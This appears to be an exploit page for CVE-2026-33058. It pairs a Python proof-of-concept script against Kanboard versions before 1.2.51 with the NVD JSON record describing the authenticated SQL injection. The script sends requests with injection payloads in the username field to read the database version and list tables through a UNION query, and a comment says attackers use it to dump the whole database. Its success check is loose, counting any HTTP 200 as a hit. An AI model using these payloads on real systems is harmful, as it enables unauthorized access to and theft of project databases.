CVE-2026-33058

import requests import sys # CVE-2026-33058 SQL Injection PoC for Kanboard < 1.2.51 # Target: Kanboard application with project user management permission TARGET_URL = "http://target-kanboard-url" API_KEY = "your-kanboard-api-key" PROJECT_ID = "1" def exploit_sql_injection(): """ SQL Injection PoC - Extract database version information This demonstrates the vulnerability in project user addition functionality """ headers = { "Authorization": f"Bearer {API_KEY}", "Content-Type": "application/json" } # Malicious payload to extract database version via SQL injection # In real exploitation, attacker uses this to dump entire database payload = { "project_id": PROJECT_ID, "username": "test_user', (SELECT @@version)-- -", "role": "member" } endpoint = f"{TARGET_URL}/?controller=ProjectUserController&action=save" try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) print(f"[*] Request sent to {endpoint}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") if "version" in response.text.lower() or response.status_code == 200: print("[+] Potential SQL injection successful - database info leaked") else: print("[-] No obvious response, manual verification needed") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def extract_database_schema(): """ Advanced exploitation: Extract all table names from database """ headers = { "Authorization": f"Bearer {API_KEY}", "Content-Type": "application/json" } # Payload to extract all table names using UNION injection payload = { "project_id": PROJECT_ID, "username": "admin' UNION SELECT table_name FROM information_schema.tables-- -", "role": "member" } endpoint = f"{TARGET_URL}/?controller=ProjectUserController&action=save" response = requests.post(endpoint, json=payload, headers=headers, timeout=10) return response.text if __name__ == "__main__": print("="*60) print("CVE-2026-33058 Kanboard SQL Injection PoC") print("="*60) exploit_sql_injection()

{"cve": {"id": "CVE-2026-33058", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:27.727", "lastModified": "2026-03-18T17:52:14.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kanboard is project management software focused on Kanban methodology. Versions prior to 1.2.51 have an authenticated SQL injection vulnerability. Attackers with the permission to add users to a project can leverage this vulnerability to dump the entirety of the kanboard database. Version 1.2.51 fixes the issue."}, {"lang": "es", "value": "Kanboard es un software de gestión de proyectos enfocado en la metodología Kanban. Las versiones anteriores a la 1.2.51 tienen una vulnerabilidad de inyección SQL autenticada. Los atacantes con permiso para añadir usuarios a un proyecto pueden aprovechar esta vulnerabilidad para volcar la totalidad de la base de datos de Kanboard. La versión 1.2.51 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.51", "matchCriteriaId": "072A459D-CB3E-4256-ACB0-F83BE3E0B89A"}]}]}], "references": [{"url": "https://github.com/kanboard/kanboard/security/advisories/GHSA-f62r-m4mr-2xhh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}